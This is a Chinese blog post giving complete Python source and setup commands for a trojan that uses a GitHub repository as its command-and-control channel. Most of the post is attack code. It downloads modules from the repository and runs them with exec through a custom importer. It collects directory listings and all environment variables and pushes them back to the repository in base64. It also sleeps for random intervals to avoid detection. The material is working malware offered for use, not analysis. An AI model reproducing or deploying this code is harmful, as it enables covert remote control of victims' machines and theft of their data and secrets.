基于GitHub的命令和控制-优快云博客

本文链接：https://blog.youkuaiyun.com/lyshark_csdn/article/details/124939963

本文介绍了一种利用GitHub作为隐蔽通信通道的木马系统实现方法。该系统通过创建特定的GitHub仓库并使用Python脚本进行模块化管理，实现了远程配置加载、模块执行及结果回传等功能。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

GitHub账号设置

mkdir trojan
cd trojan
git init
mkdir modules
mkdir config
mkdir data
touch modules/.gitignore
touch config/.gitignore
touch data/.gitignore
git add .
git commit -m "Adding repo structure for trojan."
git remote add origin https://github.com/<你的GitHub用户名>/chapter7.git
git push origin master

创建模块

dirlist.py：

import os

def run(**args):
    
    print "[*] In dirlister module. "
    files = os.listdir(".")

    return str(files)

environment.py：

import os

def run(**args):
    print "[*] In environment module. "
    return str(os.environ)

在项目的主目录中通过下面命令将其推送上去：

git add .
git commit -m "Adding new modules"
git push origin master

配置：

进入config目录，新建abc.json：

[
    {
    "module" : "dirlister"
    },
    {
    "module" : "environment"
    }
]

推送代码上去GitHub：

git add .

git commit -m "Adding simple config."

git push origin master

编写基于GitHub通信

#!/usr/bin/python
#coding=utf-8

import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os

from github3 import login

trojan_id = "abc"

trojan_config = "%s.json"%trojan_id
data_path = "data/%s/"%trojan_id
trojan_modules = []
configured = False
task_queue = Queue.Queue()

def connect_to_github():
    gh = login(username="你的GitHub用户名",password="密码")
    repo = gh.repository("你的GitHub用户名","chapter7")
    branch = repo.branch("master")

    return gh,repo,branch

def get_file_contents(filepath):
    gh,repo,branch = connect_to_github()
    tree = branch.commit.commit.tree.recurse()

    for filename in tree.tree:
        if filepath in filename.path:
            print "[*] Found file %s"%filepath
            blob = repo.blob(filename._json_data['sha'])
            return blob.content

    return None

def get_trojan_config():
    global configured
    config_json = get_file_contents(trojan_config)
    config = json.loads(base64.b64decode(config_json))
    configured = True

    for task in config:
        if task['module'] not in sys.modules:
            exec("import %s"%task['module'])

    return config

def store_module_result(data):
    gh,repo,branch = connect_to_github()
    remote_path = "data/%s/%d.data"%(trojan_id,random.randint(1000,100000))
    repo.create_file(remote_path,"Commit message",base64.b64encode(data))
    return

class GitImporter(object):
    """docstring for GitImporter"""
    def __init__(self):
        self.current_module_code = ""

    def find_module(self,fullname,path=None):
        if configured:
            print "[*] Attempting to retrieve %s"%fullname
            new_library = get_file_contents("modules/%s"%fullname)

            if new_library is not None:
                self.current_module_code = base64.b64decode(new_library)
                return self

        return None

    def load_module(self,name):
        module = imp.new_module(name)
        exec self.current_module_code in module.__dict__
        sys.modules[name] = module

        return module
        
def module_runner(module):
    task_queue.put(1)
    result = sys.modules[module].run()
    task_queue.get()

    #保存结果到我们的repo中
    store_module_result(result)

    return

#木马的主循环
sys.meta_path = [GitImporter()]

while True:
    if task_queue.empty():
        config = get_trojan_config()
    for task in config:
        t = threading.Thread(target=module_runner,args=(task['module'],))
        t.start()
        time.sleep(random.randint(1,10))

    time.sleep(random.randint(1000,10000))